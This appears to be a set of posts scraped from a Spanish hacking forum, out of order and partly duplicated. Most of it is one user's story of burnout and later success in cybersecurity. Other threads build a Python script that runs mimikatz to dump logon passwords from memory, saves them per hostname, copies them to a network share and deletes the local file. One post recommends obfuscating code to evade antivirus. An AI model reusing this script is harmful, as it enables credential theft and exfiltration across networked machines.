No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Se me olvidaba, no se si esta en la seccion correcta, y otra cosa, obfuscar el codigo antes de usarlo, q cualquiera q lo lea sabe q hace.

¿La web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta comparte muestras con las compañias de AV?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¡Te entiendo! últimamente siento lo mismo, no me interesa nada más y me siento bastante deprimido, para ser honesto, ni siquiera tengo idea de qué hacer al respecto... Estoy muy cansado de todo y ningún pasatiempo me interesa más...

Ánimo!!! Aprovecha el tocar fondo para tomar impulso hacia arriba. Es dificil luchar con la frustración que puede generar este mundillo por eso es necesario compensarlo con la PASION y ENTUSIAMOS que te genera. Debemos tener cuidado porque nosotros mismos podemos ser nuestro mayor enemigo y saboteador. Todo está en la mente.

"Un barco no flota porque esté rodeado de agua sino porque no deja que el agua penetre en su interior" Epicteto

Muy recomendable leer escritores estoicos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Recuerdo este Post de hace 5 años, me parece increible como después de tanto tiempo conseguiste volver a un camino que te motivaba.

Felicidades

Gracias por tu comentario. Me puse a lo mio y me olvide del post. No es que me motivara el camino sino que es una PASION que es necesaria para poder manejar la frustración.

Me gustaría que mi experiencia sirva a la gente que se encuentra en esa situación en la que me encontraba.  De hecho, he vuelto a cambiar de trabajo. Ahora estoy en una de las mejores empresas de ciberseguridad del país y posiblemente del mundo. Todavía no me lo creo. He pasado de jugar en tercera división a jugar en primera junto a los mejores hackers del mundo. Es increible.

Consejo a los que buscan trabajo en ciberseguridad y no tienen experiencia pero si muchos conocimientos técnicos (aunque necesitaran alta experiencia en otras ramas como SysAdmin o developer):

AHORA ES EL MOMENTO. La demanda en tecnicos de ciberseguridad y analistas se ha disparado de forma increible. Bueno, no tan increible porque a estas altturas no queda una sola empresa que no haya tenido al menos un incidente de seguridad crítico. Estamos practicamente en una jodida ciberguerra y hacen falta soldados.

Intenten cubrir la falta de experiencia potenciando vuestra parte ENTUSIASTA en las entrevistas y haciendo alarde de conocimientos técnicos y metodologías. Además, no todo en ciberseguridad es pentesting/red teaming. Perfiles de Threat hunting, Treath intelligence y DFIR están muy demandados y no encuentran mano de obra.  Otra opción muy buen es darle caña a los CTF's, no solo de pentesting, para poder mostrar tu perfil en las entrevistas como una suerte de portfolio o conocimientos técnicos demostrados.

"La suerte ocurre cuando se juntan la preparación y la oportunidad". Séneca

Happy Hacking!!!!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas undercodeanos.

Me inicié en el mundo de la informática hace ya 10 años cuándo empecé el FP2 de Administración de Sistemas Informáticos. En poco tiempo y con apenas conocimientos, empecé a interesarme por el mundo de la seguridad informática y hacking ético. En ese momento para mi fue como descubrir un mundo nuevo. Un mundo donde había libertad y el conocimiento se compartia de forma altruista. Me pegaba horas y horas leyendo, estudiando, probando. Cada vez me gustaba más, mi motivación y curiosidad no tenía límites.

Terminé el curso y conseguí un trabajo de técnico de sistemas. Pronto empecé a aplicar mis conocimientos en mi puesto de trabajo. Todos los días revisaba los blogs de referencia hacker. Salía del trabajo con la ilusión de probar ese nuevo Poc que encontraba fascinante. Me compré varios libros de 0xWord que son fantasticos. Horas y horas haciendo pruebas, aprendiendo. Quería ser un puto cremas en el mundillo así que no dude en empezar otro FP2 a distancia mientras complementaba estudios y trabajo. Así es como empece Desarrollo de Aplicaciones para móviles. Si quería avanzar en el mundo del hacking tenía que aprender a programar. Hice mis pinitos en python, lenguaje que me encanta y que he aprendido en el trabajo de forma autodidacta para dar soluciones y mejoreas en la gestión del Dpto.

Así era feliz, haciendo mi trabajo lo mejor posible. Pensando continuamente que mejorar y como hacerlo. Después del trabajo me iba a casa a ver las clases de la FP, hacer los ejercicios, entregar los trabajos y llegar a los exámenes con la mejor preparación posible. A parte, siempre había algo que probar, cosas que investigar y aprender.

Pero de repente un día la vida me dió un palo, de esos que duelen, de esos que te hacen abrir los ojos y mirar alrededor. De esos que te hace cambiar la perspectiva en la vida y hacer un replanteamiento vital. Y me di cuenta de que la vida pasaba mientras miraba una pantalla 12 horas al día. Entré en estado de introspección y me di cuenta de que la mayoria de esas horas lo único que hacía era solucionar problemas, todo daba problemas pero mi perseverancia y paciencia me hacían conseguir el objetivo perseguido. Eché la vista atrás y me vi a mi mismo delante de una pantalla, con la espalda encorvada hacia delante e hipnotizado por una sucesión alfanumerica de color verde en un fondo negro.

Y ya no puedo más. Me he saturado. He perdido la motivación en lo que tanto amaba. Tantas horas probando cosas, fallando, volviendo a probar, volviendo a fallar. Todos los del foro sabemos que las cosas NUNCA funcionan a la primera y si en algún momento funcionan, en otro momento volveran a fallar. Ya estoy cansado. He llegado a un punto en el que no soporte los ordenadores y eso que soy el soporte informático en mi trabajo, es irónico, el soporte ya no soporta. Aquél al que llaman cuando no funciona outlook o no se les enciende la pantalla porque esta apagada desde el botón físico. Putas chorradas de lusers que me interrumpen en tareas mas importantes y que sabrían solucionarlas si quisieran aprender algo mas allá de hacer doble click.

En el trabajo los problemas crecen. Que si el outlook falla cada dos por tres en puestos que tendrán configuradas 17 cuentas. Que si la puta replicación DFS ha dejado de funcionar y lo que ven en una sede no lo ven en otra. Vete tu a sabe porque. Hay que darle una solucón pero ¿cuál? Que si mi ordenador va lento y no se que le pasa. Es lo que mejor hacen los ordenadores, dar problemas y yo ya no puedo más. Todos los días haciendo varias cosas a la vez y encima atendiendo las llamadas de los lusers, no los aguanto ni a ellos ni las maquinas que usan. Esto me genera mucho desgaste.

Estoy pensando en pedir una excedencia, agarrar la mochila e irme lejos a dónde no haya maquinas ni tecnología ni ordenadores ni smartphones. Que lo mas moderno que use sea un reloj de agujas. A desconectarme totalmente para conectame con mi yo interior y volver a encontrar mi camino.

En fin, solo quería desahogarme un poco entre gente que posiblemente me pueda comprender. Agradecería que si a alguien le ha pasado lo mismo o le pasa, comparta su experiencia.

No se si esto será pasajero o definitivo pero es muy frustrante que aquello que tanto amaba y que me da de comer se haya convertido en una suerte de hastío y apatía para mi.

Gracias por leerme. Saludos a todos.

Me cito a mi yo del pasado (perdon por el reflote)

Increible como cambian las cosas con el tiempo.  Casi cinco años y me han pasado muchas cosas desde que escribí esto. Recuerdo el día, dónde estaba y las sensaciones que tenía.  Se podría decir que en ese momento estaba tocando fondo y no lo sabia, pensaba que quedaba mas caída pero ahora repaso todo lo acontecido desde entonces y veo que he ido cumpliendo sueño tras sueño. Objetivo tras objetivo y todo fue paso a paso, de forma sutil, sin darme cuenta de que llegaba a las metas.

"Si tienes un ojo puesto en la meta solo te quedará uno para el camino".

En resumen, 

Al tiempo de escribir eso deje ese trabajo y encontre otro que me motivaba mas pero los jefes eran unos incompetentes. En 2019 me fui de mochilero por el mundo durante 13 meses y regrese por la pandemia. Encontre un trabajo de SysAdmin y hago teletrabajo. En breves seré Tecnico de Ciberseguridad en esa misma empresa. Todavía no me lo creo.  LO CONSEGUÍ. Lo hice joder !!! jajajaja. Increible. 

Es por esto que reaparezco por aqui  y he visto los ultimos hilos que escribí.

Estaré ratoneando por la zona de reversing y analisis de malware.  Toca desenpolvar los miticos manuales de ANTRAX.

Sin comunidades como esta no hubiese sido posible. Un saludo Underc0ders.

Verifica en los devices de VMware que la interfaz de red esté en On. A mi alguna vez me paso pero con el de CD y me volví loco.

Buenas undercodeanos.

Me inicié en el mundo de la informática hace ya 10 años cuándo empecé el FP2 de Administración de Sistemas Informáticos. En poco tiempo y con apenas conocimientos, empecé a interesarme por el mundo de la seguridad informática y hacking ético. En ese momento para mi fue como descubrir un mundo nuevo. Un mundo donde había libertad y el conocimiento se compartia de forma altruista. Me pegaba horas y horas leyendo, estudiando, probando. Cada vez me gustaba más, mi motivación y curiosidad no tenía límites.

Terminé el curso y conseguí un trabajo de técnico de sistemas. Pronto empecé a aplicar mis conocimientos en mi puesto de trabajo. Todos los días revisaba los blogs de referencia hacker. Salía del trabajo con la ilusión de probar ese nuevo Poc que encontraba fascinante. Me compré varios libros de 0xWord que son fantasticos. Horas y horas haciendo pruebas, aprendiendo. Quería ser un puto cremas en el mundillo así que no dude en empezar otro FP2 a distancia mientras complementaba estudios y trabajo. Así es como empece Desarrollo de Aplicaciones para móviles. Si quería avanzar en el mundo del hacking tenía que aprender a programar. Hice mis pinitos en python, lenguaje que me encanta y que he aprendido en el trabajo de forma autodidacta para dar soluciones y mejoreas en la gestión del Dpto.

Así era feliz, haciendo mi trabajo lo mejor posible. Pensando continuamente que mejorar y como hacerlo. Después del trabajo me iba a casa a ver las clases de la FP, hacer los ejercicios, entregar los trabajos y llegar a los exámenes con la mejor preparación posible. A parte, siempre había algo que probar, cosas que investigar y aprender.

Pero de repente un día la vida me dió un palo, de esos que duelen, de esos que te hacen abrir los ojos y mirar alrededor. De esos que te hace cambiar la perspectiva en la vida y hacer un replanteamiento vital. Y me di cuenta de que la vida pasaba mientras miraba una pantalla 12 horas al día. Entré en estado de introspección y me di cuenta de que la mayoria de esas horas lo único que hacía era solucionar problemas, todo daba problemas pero mi perseverancia y paciencia me hacían conseguir el objetivo perseguido. Eché la vista atrás y me vi a mi mismo delante de una pantalla, con la espalda encorvada hacia delante e hipnotizado por una sucesión alfanumerica de color verde en un fondo negro.

Y ya no puedo más. Me he saturado. He perdido la motivación en lo que tanto amaba. Tantas horas probando cosas, fallando, volviendo a probar, volviendo a fallar. Todos los del foro sabemos que las cosas NUNCA funcionan a la primera y si en algún momento funcionan, en otro momento volveran a fallar. Ya estoy cansado. He llegado a un punto en el que no soporte los ordenadores y eso que soy el soporte informático en mi trabajo, es irónico, el soporte ya no soporta. Aquél al que llaman cuando no funciona outlook o no se les enciende la pantalla porque esta apagada desde el botón físico. Putas chorradas de lusers que me interrumpen en tareas mas importantes y que sabrían solucionarlas si quisieran aprender algo mas allá de hacer doble click.

En el trabajo los problemas crecen. Que si el outlook falla cada dos por tres en puestos que tendrán configuradas 17 cuentas. Que si la puta replicación DFS ha dejado de funcionar y lo que ven en una sede no lo ven en otra. Vete tu a sabe porque. Hay que darle una solucón pero ¿cuál? Que si mi ordenador va lento y no se que le pasa. Es lo que mejor hacen los ordenadores, dar problemas y yo ya no puedo más. Todos los días haciendo varias cosas a la vez y encima atendiendo las llamadas de los lusers, no los aguanto ni a ellos ni las maquinas que usan. Esto me genera mucho desgaste.

Estoy pensando en pedir una excedencia, agarrar la mochila e irme lejos a dónde no haya maquinas ni tecnología ni ordenadores ni smartphones. Que lo mas moderno que use sea un reloj de agujas. A desconectarme totalmente para conectame con mi yo interior y volver a encontrar mi camino.

En fin, solo quería desahogarme un poco entre gente que posiblemente me pueda comprender. Agradecería que si a alguien le ha pasado lo mismo o le pasa, comparta su experiencia.

No se si esto será pasajero o definitivo pero es muy frustrante que aquello que tanto amaba y que me da de comer se haya convertido en una suerte de hastío y apatía para mi.

Gracias por leerme. Saludos a todos.

Muchas gracias por la ayuda. Ya he conseguí lo que quería. Pego el código:

# -*- coding: UTF-8-*-

import os
import subprocess
from subprocess import Popen, PIPE
import time
import sys

process = subprocess.Popen('C:\\excepciones\\mimikatz', stdin=PIPE, stdout=PIPE)
process.stdin.write('sekurlsa::logonpasswords\n')
time.sleep(1)
con = sys.getsizeof(process.stdout)
p2 = subprocess.Popen('hostname', stdout=PIPE)
equipo = p2.stdout.read()
p2.kill()
equipo = equipo.strip() + '.txt'
ruta = 'C:\\excepciones\\' + equipo
repo = '\\\mies-054\logs\\'
foo = open(ruta, 'w')
for i in range(con):
	salida = process.stdout.readline()
	if ('*' in salida) and ('Username' in salida or 'Password' in salida or 'Domain' in salida):
		foo.write(salida.strip())
		foo.write('\n')
foo.close()
process.kill()
os.system('xcopy "%s" "%s"' % (ruta, repo))
os.system('erase "%s"' % (ruta)) 
sys.exit(0)

Lo que hace el script es invocar mimikatz pasando la orden a través de stdin y guarda los passwords en RAM en un txt con el hostname del equipo. Después mueve el txt a un recurso de red para chequearlo.

Pueden cerrar el tema, aunque creo que sería interesante moverlo a desarrollo de scripts en python.

Gracias y saludos.

¿Exactamente que tipo de ataques has practicado?. ¿Que herramientas has usado? Te recomiendo algún manual de la pila TCP/IP y el modelo OSI para comprender mejor el funcionamiento. También te recomiendo dejar las herramientas automáticas tipo ettercap y empieza a usar SCAPY para construir manualmente tus paquetes. Tambien podrías probar a injectar shells al vuelo en archivos ejecutables. En el libro que comentas de Chema tiénes mucha info para practicar.

Saludos.

Buenos días,

Tras muchas horas de prueba, voy consiguiendo algo.

import os
import subprocess
from subprocess import Popen, PIPE
import time

process = subprocess.Popen('mimikatz', stdin=PIPE, stdout=PIPE)
process.stdin.write('sekurlsa::logonpasswords\n')
time.sleep(1)
salida = process.stdout.readline()
while True:
	if ('*' in salida) and ('Username' in salida or 'Password' in salida or 'Domain' in salida):
		print salida.strip()
	salida = process.stdout.readline()
process.kill()

Consigo sacar la información que quiero por pantalla pero al llegar a la última lectura del stdout se queda el proceso hijo esperando a algo y lo tengo que para con el keyboard. ¿Alguien sabria porque ocurre ésto?

Gracias y saludos.

Lo único que puedes hacer es "atacar" al archivo por diccionario. Hazte un diccionario con las contraseñas que sueles poner y cruza los dedos.

Saludos.

Buenas tardes,

Sigo con mis pruebas. He conseguido enviar y recibir datos:

import os
import subprocess
from subprocess import Popen, PIPE

process = subprocess.Popen('mimikatz', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
print "1"
process.stdin.write('sekurlsa::logonpasswords\n')
print "2"
salida = process.stdout.read()
print "3"
process.kill()
print "4"
print salida

Los número están para debug. El caso es que en salida = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta() se queda detenida la ejecucón. Es decir, no pasa del dos. Pero si detengo mimkatz desde el admin de tareas continua con la ejecución e imprime los datos

 Puedes utilizar el modulo subprocess.Popen para capturar la salida del programa y almacenar el un buffer con .communicate() para después tratar la información con un bucle for.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   Apartado 10.1.3.1. Capturando la salida con Popen

Saludos.

Buenas tardes,

Llevo ya tiempo intentando entender el tema de subprocess.Popen y sus entradas y salidas. Quiero hacer un script para automatizar mimikatz.
Trato de abrir el proceso mimikatz como hijo así: process = subprocess.Popen('mimikatz', stdin=subprocess.PIPE, stdout=subprocess.PIPE) y parece que hace algo pero nada.

Si llamo al hijo así process = subprocess.Popen('mimikatz',stdin=subprocess.PIPE) se queda en bucle infinito con el prompt del mimikatz. Aunque le ponga un wait() no pasa de esa orden. 

Si lo pongo así process = subprocess.Popen('mimikatz').

La pregunta es: ¿Cómo llamo a un proceso hijo al cuál el padre envia y recibe los datos? es decir ¿Cómo interactuar con un proceso hijo?

Gracias y saludos.

Adoro Wireshark. Me ha gustado tu post. Gracias por el aporte. Un saludo